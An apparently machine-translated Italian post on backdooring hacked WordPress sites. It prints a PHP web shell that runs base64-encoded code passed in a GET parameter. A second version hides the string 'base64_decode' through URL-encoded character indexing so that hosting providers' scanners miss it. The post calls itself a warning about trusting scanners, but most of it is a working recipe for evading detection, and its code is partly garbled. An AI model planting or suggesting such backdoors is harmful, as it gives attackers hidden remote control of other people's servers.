Di recente, molti siti web basati su Wordpress sono stati violati a causa di alcuni plugin exploit che hanno permesso agli hacker di scrivere un file php all'interno del server web. Così di solito, l'hacker caricherà una shell completa o qualcosa del genere. Ma oggi, i fornitori sono in esecuzione alcune rilevazioni shell Strumenti quindi è abbastanza difficile per gli hacker di ottenere una shell completa esecuzione tutto il tempo sul sito web, che sarà molto probabilmente essere rilevati e cancellato in seguito. E adesso? Danno up? Nah.




Codice PHP:
if (isset ( $ _GET "data" ])) { 
eval ( 
base64_decode ( $ _GET "data" ])); 

Queste linee sono sufficienti per ottenere il pieno controllo del server web. Perché? funzione eval sarà eseguire codice PHP all'interno (); Quindi, nel nostro caso, lo script eval il base64_decoded da $ _GET ["data"]; Scrivi il tuo script php dannoso, codificare in base64 poi basta usare $ _GET sul infetti sceneggiatura e si può fare tutto quello che vuoi. Ma hehehehe, i fornitori stanno ora spuntando avvisi su eval (base64_decode) istruzioni partecipavano . MA faccio come roba prova muto E per quanto riguarda il seguito?




Codice PHP:
<?php 
$var 
urldecode '%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64' );  //fg6sbehpra4co_tnd 
$nub  =  $var ]. $var ]. $var ]. $var ]. $var ]. $var 10 ]. $var 13 ]. $var 16 ]. $var ]. $var 11 ]. $var 12 ]. $var 16 ]. $var ]; 
if(isset( 
$_GET "data" ])){ 
eval( 
$nub $_GET "data" ])); 

?>
In questo modo, mentre bot del provider verrà letto il copione, che non vedrà mai la eval (base64_decode) combinata. Quindi non rilevazioni a tutti . Questo thread è un semplice avvertimento a tutti voi, non scommettere la sicurezza del tuo sito web su scanner.

👉 Potrebbero interessarti anche: